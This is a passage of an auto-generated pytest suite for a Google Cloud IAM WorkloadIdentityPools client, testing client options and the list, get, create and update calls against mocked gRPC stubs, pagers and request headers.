@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_workload_identity_pools_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(WorkloadIdentityPoolsClient, transports.WorkloadIdentityPoolsGrpcTransport, "grpc"),
(WorkloadIdentityPoolsAsyncClient, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_workload_identity_pools_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_workload_identity_pools_client_client_options_from_dict():
with mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = WorkloadIdentityPoolsClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_list_workload_identity_pools(transport: str = 'grpc', request_type=workload_identity_pool.ListWorkloadIdentityPoolsRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse(
next_page_token='next_page_token_value',
)
response = client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_workload_identity_pools_from_dict():
test_list_workload_identity_pools(request_type=dict)
def test_list_workload_identity_pools_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
client.list_workload_identity_pools()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolsRequest()
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.ListWorkloadIdentityPoolsRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolsResponse(
next_page_token='next_page_token_value',
))
response = await client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolsAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async_from_dict():
await test_list_workload_identity_pools_async(request_type=dict)
def test_list_workload_identity_pools_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse()
client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_workload_identity_pools_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolsResponse())
await client.list_workload_identity_pools(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_workload_identity_pools_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_workload_identity_pools(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_workload_identity_pools_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_workload_identity_pools(
workload_identity_pool.ListWorkloadIdentityPoolsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_workload_identity_pools_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_workload_identity_pools(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pools_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_workload_identity_pools(
workload_identity_pool.ListWorkloadIdentityPoolsRequest(),
parent='parent_value',
)
def test_list_workload_identity_pools_pager():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_workload_identity_pools(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPool)
for i in results)
def test_list_workload_identity_pools_pages():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
pages = list(client.list_workload_identity_pools(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async_pager():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
async_pager = await client.list_workload_identity_pools(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPool)
for i in responses)
@pytest.mark.asyncio
async def test_list_workload_identity_pools_async_pages():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pools),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolsResponse(
workload_identity_pools=[
workload_identity_pool.WorkloadIdentityPool(),
workload_identity_pool.WorkloadIdentityPool(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_workload_identity_pools(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_get_workload_identity_pool(transport: str = 'grpc', request_type=workload_identity_pool.GetWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPool(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPool.State.ACTIVE,
disabled=True,
)
response = client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPool)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPool.State.ACTIVE
assert response.disabled is True
def test_get_workload_identity_pool_from_dict():
test_get_workload_identity_pool(request_type=dict)
def test_get_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
client.get_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_get_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.GetWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPool(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPool.State.ACTIVE,
disabled=True,
))
response = await client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPool)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPool.State.ACTIVE
assert response.disabled is True
@pytest.mark.asyncio
async def test_get_workload_identity_pool_async_from_dict():
await test_get_workload_identity_pool_async(request_type=dict)
def test_get_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
call.return_value = workload_identity_pool.WorkloadIdentityPool()
client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPool())
await client.get_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPool()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_workload_identity_pool(
workload_identity_pool.GetWorkloadIdentityPoolRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPool()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPool())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_workload_identity_pool(
workload_identity_pool.GetWorkloadIdentityPoolRequest(),
name='name_value',
)
def test_create_workload_identity_pool(transport: str = 'grpc', request_type=gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_workload_identity_pool_from_dict():
test_create_workload_identity_pool(request_type=dict)
def test_create_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
client.create_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_create_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_workload_identity_pool_async_from_dict():
await test_create_workload_identity_pool_async(request_type=dict)
def test_create_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.create_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_workload_identity_pool(
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].workload_identity_pool_id == 'workload_identity_pool_id_value'
def test_create_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_workload_identity_pool(
gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest(),
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
@pytest.mark.asyncio
async def test_create_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_workload_identity_pool(
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool == gi_workload_identity_pool.WorkloadIdentityPool(name='name_value')
assert args[0].workload_identity_pool_id == 'workload_identity_pool_id_value'
@pytest.mark.asyncio
async def test_create_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_workload_identity_pool(
gi_workload_identity_pool.CreateWorkloadIdentityPoolRequest(),
parent='parent_value',
workload_identity_pool=gi_workload_identity_pool.WorkloadIdentityPool(name='name_value'),
workload_identity_pool_id='workload_identity_pool_id_value',
)
def test_update_workload_identity_pool(transport: str = 'grpc', request_type=gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_update_workload_identity_pool_from_dict():
test_update_workload_identity_pool(request_type=dict)
def test_update_workload_identity_pool_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
client.update_workload_identity_pool()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
@pytest.mark.asyncio
async def test_update_workload_identity_pool_async(transport: str = 'grpc_asyncio', request_type=gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.update_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.update_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == gi_workload_identity_pool.UpdateWorkloadIdentityPoolRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_update_workload_identity_pool_async_from_dict():
await test_update_workload_identity_pool_async(request_type=dict)
def test_update_workload_identity_pool_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
